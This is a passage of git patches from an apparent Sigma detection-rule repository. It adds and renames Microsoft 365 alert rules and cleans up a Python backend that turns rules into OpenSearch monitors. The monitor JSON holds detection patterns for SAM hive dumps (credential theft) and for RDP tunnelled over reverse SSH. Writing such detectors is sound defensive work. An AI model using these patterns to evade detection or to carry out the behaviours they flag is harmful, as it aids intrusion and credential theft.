...5_activity_from_anonymous_ip_addresses.yml | 24 +++++++++++++++++++ ...ft365_activity_from_infrequent_country.yml | 10 ++++---- ...rosoft365_from_suspicious_ip_addresses.yml | 10 ++++---- ...ous_oauth_app_file_download_activities.yml | 3 ++- 4 files changed, 36 insertions(+), 11 deletions(-) create mode 100644 rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml new file mode 100644 index 00000000..697d6f8d --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from anonymous IP addresses +id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from anonymous IP addresses" + status: success + condition: selection +falsepositives: + - User using a VPN or Proxy +level: medium +tags: + - attack.command_and_control + - attack.t1573 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 6e161f7d..8e155919 100644 --- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,14 +1,14 @@ title: Microsoft 365 - Activity from infrequent country id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. author: Austin Songer @austinsonger date: 2021/08/23 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: @@ -17,8 +17,8 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.initial_access - - \ No newline at end of file + - attack.command_and_control + - attack.t1573 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 36f5e305..4ade854a 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,14 +1,14 @@ title: Microsoft 365 - Activity from suspicious IP addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. author: Austin Songer @austinsonger date: 2021/08/23 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatDetection service: m365 detection: selection: @@ -17,8 +17,8 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.initial_access - - \ No newline at end of file + - attack.command_and_control + - attack.t1573 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 91cbe32c..906cd100 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -20,4 +20,5 @@ falsepositives: - Unknown level: medium tags: - - attack.exfiltration \ No newline at end of file + - attack.exfiltration + \ No newline at end of file From 53482b7e9cb9d2fc05f5de477d0463cebd93074b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:19:41 +0000 Subject: [PATCH 0533/1367] Update --- ...crosoft365_activity_by_terminated_user.yml | 2 +- ...5_activity_from_anonymous_ip_addresses.yml | 2 +- ...ft365_activity_from_infrequent_country.yml | 2 +- ...icrosoft365_activity_from_ip_addresses.yml | 24 ------------------- ...rosoft365_from_suspicious_ip_addresses.yml | 2 +- ...crosoft365_suspicious_inbox_forwarding.yml | 2 +- ...ous_oauth_app_file_download_activities.yml | 1 - 7 files changed, 5 insertions(+), 30 deletions(-) delete mode 100644 rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 037dcd00..5b2e2df9 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -20,4 +20,4 @@ falsepositives: - Unknown level: medium tags: - - attack.impact \ No newline at end of file + - attack.impact diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml index 697d6f8d..a46219e1 100644 --- a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.command_and_control - - attack.t1573 \ No newline at end of file + - attack.t1573 diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 8e155919..3d7862fa 100644 --- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.command_and_control - - attack.t1573 \ No newline at end of file + - attack.t1573 diff --git a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml deleted file mode 100644 index ac34cd56..00000000 --- a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Microsoft 365 - Activity from anonymous IP addresses -id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 -status: experimental -description: Detects when a Microsoft Cloud App Security reported -author: Austin Songer @austinsonger -date: 2021/08/23 -references: - - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference -logsource: - category: - service: m365 -detection: - selection: - eventSource: SecurityComplianceCenter - eventName: "Activity from anonymous IP addresses" - status: success - condition: selection -falsepositives: - - -level: medium -tags: - - attack.initial_access - - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 4ade854a..8c703557 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.command_and_control - - attack.t1573 \ No newline at end of file + - attack.t1573 diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index e583f123..7910c62c 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -21,4 +21,4 @@ falsepositives: level: low tags: - attack.exfiltration - - attack.t1020 \ No newline at end of file + - attack.t1020 diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 906cd100..3ba0e326 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -21,4 +21,3 @@ falsepositives: level: medium tags: - attack.exfiltration - \ No newline at end of file From 84944cf84965ecba07daf0e7e50ca7cc60830443 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:30:11 +0000 Subject: [PATCH 0534/1367] Update --- rules/cloud/m365/microsoft365_activity_by_terminated_user.yml | 2 +- .../m365/microsoft365_activity_from_anonymous_ip_addresses.yml | 2 +- .../m365/microsoft365_activity_from_infrequent_country.yml | 2 +- .../m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml | 2 +- rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml | 2 +- rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml | 2 +- rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml | 2 +- ...crosoft365_suspicious_oauth_app_file_download_activities.yml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 5b2e2df9..738af6e9 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity performed by terminated user +title: Activity performed by terminated user id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: experimental description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml index a46219e1..cf1cb871 100644 --- a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity from anonymous IP addresses +title: Activity from anonymous IP addresses id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: experimental description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 3d7862fa..9c8a433f 100644 --- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity from infrequent country +title: Activity from infrequent country id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index a758f328..09256f6a 100644 --- a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 Data exfiltration to unsanctioned apps +title: Data exfiltration to unsanctioned apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: experimental description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 8c703557..1714b0cd 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity from suspicious IP addresses +title: Activity from suspicious IP addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index f841b3dd..99950ddc 100644 --- a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 Log on from a risky IP address +title: Logon from a risky IP address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: experimental description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 7910c62c..5975e8b3 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Suspicious inbox forwarding +title: Suspicious inbox forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 3ba0e326..29944ff4 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Suspicious OAuth app file download activities +title: Suspicious OAuth app file download activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. From ad892eb239f10cafd6634c4fa6c17c9439391506 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:46:37 +0000 Subject: [PATCH 0535/1367] Update --- .../m365/m365_activity_by_terminated_user.yml | 23 +++++++++++++++++++ ..._activity_from_anonymous_ip_addresses.yml} | 0 ...m365_activity_from_infrequent_country.yml} | 0 ...data_exfiltration_to_unsanctioned_app.yml} | 0 ... => m365_from_suspicious_ip_addresses.yml} | 0 ...l => m365_logon_from_risky_ip_address.yml} | 0 ...l => m365_suspicious_inbox_forwarding.yml} | 0 ...us_oauth_app_file_download_activities.yml} | 0 8 files changed, 23 insertions(+) create mode 100644 rules/cloud/m365/m365_activity_by_terminated_user.yml rename rules/cloud/m365/{microsoft365_activity_from_anonymous_ip_addresses.yml => m365_activity_from_anonymous_ip_addresses.yml} (100%) rename rules/cloud/m365/{microsoft365_activity_from_infrequent_country.yml => m365_activity_from_infrequent_country.yml} (100%) rename rules/cloud/m365/{microsoft365_data_exfiltration_to_unsanctioned_app.yml => m365_data_exfiltration_to_unsanctioned_app.yml} (100%) rename rules/cloud/m365/{microsoft365_from_suspicious_ip_addresses.yml => m365_from_suspicious_ip_addresses.yml} (100%) rename rules/cloud/m365/{microsoft365_logon_from_risky_ip_address.yml => m365_logon_from_risky_ip_address.yml} (100%) rename rules/cloud/m365/{microsoft365_suspicious_inbox_forwarding.yml => m365_suspicious_inbox_forwarding.yml} (100%) rename rules/cloud/m365/{microsoft365_suspicious_oauth_app_file_download_activities.yml => m365_suspicious_oauth_app_file_download_activities.yml} (100%) diff --git a/rules/cloud/m365/m365_activity_by_terminated_user.yml b/rules/cloud/m365/m365_activity_by_terminated_user.yml new file mode 100644 index 00000000..738af6e9 --- /dev/null +++ b/rules/cloud/m365/m365_activity_by_terminated_user.yml @@ -0,0 +1,23 @@ +title: Activity performed by terminated user +id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee +status: experimental +description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity performed by terminated user" + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml similarity index 100% rename from rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml rename to rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/m365_activity_from_infrequent_country.yml similarity index 100% rename from rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml rename to rules/cloud/m365/m365_activity_from_infrequent_country.yml diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml similarity index 100% rename from rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml rename to rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/m365_from_suspicious_ip_addresses.yml similarity index 100% rename from rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml rename to rules/cloud/m365/m365_from_suspicious_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/m365_logon_from_risky_ip_address.yml similarity index 100% rename from rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml rename to rules/cloud/m365/m365_logon_from_risky_ip_address.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/m365_suspicious_inbox_forwarding.yml similarity index 100% rename from rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml rename to rules/cloud/m365/m365_suspicious_inbox_forwarding.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml similarity index 100% rename from rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml rename to rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml From 29e1ce7e8f32f85584432f023b9a44747e40a330 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:50:39 +0000 Subject: [PATCH 0536/1367] Update --- ...crosoft365_activity_by_terminated_user.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/m365/microsoft365_activity_by_terminated_user.yml diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml deleted file mode 100644 index 738af6e9..00000000 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: Activity performed by terminated user -id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee -status: experimental -description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. -author: Austin Songer @austinsonger -date: 2021/08/23 -references: - - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference -logsource: - category: ThreatManagement - service: m365 -detection: - selection: - eventSource: SecurityComplianceCenter - eventName: "Activity performed by terminated user" - status: success - condition: selection -falsepositives: - - Unknown -level: medium -tags: - - attack.impact From d1c7ee0830a3f988078161d0aac2f0ba3da490b3 Mon Sep 17 00:00:00 2001 From: Young Date: Mon, 23 Aug 2021 15:53:43 -0700 Subject: [PATCH 0537/1367] cleaned up backend class and re-added support for threshold rules --- tools/osMonitor.json | 2 +- tools/sigma/backends/base.py | 17 +++--- tools/sigma/backends/opensearch.py | 60 +++++++++---------- tools/sigma/sigmac.py | 93 ++++++++++++++++++++---------- 4 files changed, 104 insertions(+), 68 deletions(-) diff --git a/tools/osMonitor.json b/tools/osMonitor.json index f6839a71..1bc384ef 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json @@ -1 +1 @@ -{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}, {"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} +{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.channel": "\"Security\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"5156\""}}]}}, {"bool": {"should": [{"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.SourcePort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.DestAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.DestAddress.keyword": "\\:\\:1"}}]}}]}}, {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.DestPort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.SourceAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.SourceAddress.keyword": "\\:\\:1"}}]}}]}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index 91d2bf1b..cb887d0a 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -27,7 +27,6 @@ from sigma.parser.modifiers.base import SigmaTypeModifier class BackendOptions(dict): """ Object containing all the options that should be passed to the backend. - The options can come from command line and a YAML configuration file, and will be merged together. Options from the command line take precedence. """ @@ -44,7 +43,6 @@ class BackendOptions(dict): def _parse_options(self, options): """ Populates options from the unparsed options of the CLI - :param options: list unparsed options from the CLI. Each option can have one of the following formats: - "key=value": the option key:value will be passed to the backend @@ -65,7 +63,6 @@ class BackendOptions(dict): def _load_config_file(self, path): """ Populates options from a configuration file - :param path: Path to the configuration file """ if path is None: @@ -117,7 +114,6 @@ class BaseBackend: if len(sigmaparser.condparsed) > 1: raise NotImplementedError("Base backend doesn't support multiple conditions") for parsed in sigmaparser.condparsed: - print(f'\nParsed: {parsed}\n') query = self.generateQuery(parsed) before = self.generateBefore(parsed) after = self.generateAfter(parsed) @@ -134,7 +130,6 @@ class BaseBackend: def generateQuery(self, parsed): result = self.generateNode(parsed.parsedSearch) - print(f'\nResult: {result}\n') if parsed.parsedAgg: result += self.generateAggregation(parsed.parsedAgg) #result = self.applyOverrides(result) @@ -279,6 +274,10 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateSubexpressionNode(self, node): generated = self.generateNode(node.items) + if 'len'in dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated if generated: return self.subExpression % generated else: @@ -287,7 +286,11 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateListNode(self, node): if not set([type(value) for value in node]).issubset({str, int}): raise TypeError("List values must be strings or numbers") - return self.listExpression % (self.listSeparator.join([self.generateNode(value) for value in node])) + result = [self.generateNode(value) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + return self.listExpression % (self.listSeparator.join(result)) def generateMapItemNode(self, node): fieldname, value = node @@ -331,4 +334,4 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): in addition to the field mapping defined in the conversion configuration. The field name passed to this method was already transformed from the original name given in the Sigma rule. """ - return fieldname + return fieldname \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 73d3362f..b89c9130 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -16,23 +16,13 @@ import json import re -from fnmatch import fnmatch import sys import os -from random import randrange -from distutils.util import strtobool from typing import List, Tuple, Union from uuid import uuid4 -import sigma -import yaml -from sigma.parser.modifiers.type import SigmaRegularExpressionModifier, SigmaTypeModifier -from sigma.parser.condition import ConditionOR, ConditionAND, NodeSubexpression, SigmaAggregationParser, SigmaConditionParser, SigmaConditionTokenizer +from sigma.parser.condition import SigmaAggregationParser -from sigma.config.mapping import ConditionalFieldMapping -from .base import BaseBackend, SingleTextQueryBackend -from .mixins import RulenameCommentMixin, MultiRuleOutputMixin -from .exceptions import NotSupportedError from .elasticsearch import ElasticsearchQuerystringBackend from .defaultOpensearchValues import * @@ -72,10 +62,15 @@ def parse_atom(s: str) -> Atom: reg = r"(? Group: return Group(parse_ary(s[1:-1])) +''' +Expand special group in form of A:(B OR C) to (A:B OR A:C) +''' def expand_group(s: str) -> str: reg = r"(? dict: return translate_group(boolean.expression) -# Combining ary.bool1 and ary.bool2 into array of Boolean grouped by ANDs and split by ORs +''' +Combining ary.bool1 and ary.bool2 into array of Boolean grouped by ANDs and split by ORs. +''' def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> List[List[Boolean]]: result = [[bool1]] resultIndex = 0 @@ -171,6 +168,9 @@ def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> Li return result +''' +Wraps match statements inside bool-must statement. +''' def adjust_matches(matches: List[dict]) -> List[dict]: for index in range(len(matches)): match = matches[index] @@ -191,7 +191,6 @@ def contains_group(booleanArr: List[Boolean]) -> bool: def translate_ary(ary: Ary) -> dict: parsedTranslation = convert_bool_array(ary.bool1, ary.bool2) - # print(f'ParsedTranslation: {parsedTranslation}') clauses = [] @@ -222,11 +221,10 @@ def translate_ary(ary: Ary) -> dict: # Iterate through each statement and join match statements into array for boolean in parsedExpression: - # print(f'Boolean: {boolean}\nCurrMatches: {currMatches}\n') currMatches.append(translate_boolean(boolean)) - + + # If bool array contains a Group, match statements must also be wrapped in a bool. if contains_group(parsedExpression): - print(f"\nContains Group; currMatches: {currMatches}\n") currMatches = adjust_matches(currMatches) currQuery = { @@ -235,8 +233,6 @@ def translate_ary(ary: Ary) -> dict: } } - # print(f'\nCurrQuery: {currQuery}') - clauses.append(currQuery) translateIndex += 1 @@ -293,7 +289,6 @@ class OpenSearchBackend(object): # reset per-detection variables self.rule_threshold = {} translation = super().generate(sigmaparser) - print(f'translation: {translation}\n') if translation: index = sigmaparser.get_logsource().index if len(index) == 0: @@ -381,16 +376,25 @@ class OpenSearchBackend(object): } ''' - Builds OpenSearch monitor query from translated Elastic Common Schema query. + Builds OpenSearch monitor query from translated Elastic Rule query. Forms an abstract syntax tree (AST) + using the following repeated structures: + - Atom = A:B + - Rel = AND | OR + - Ary = Bool [Rel Bool]* + - Group = (Ary) + - SGroup = A:(B OR C) + - Bool = Atom | Group | SGroup + + Then 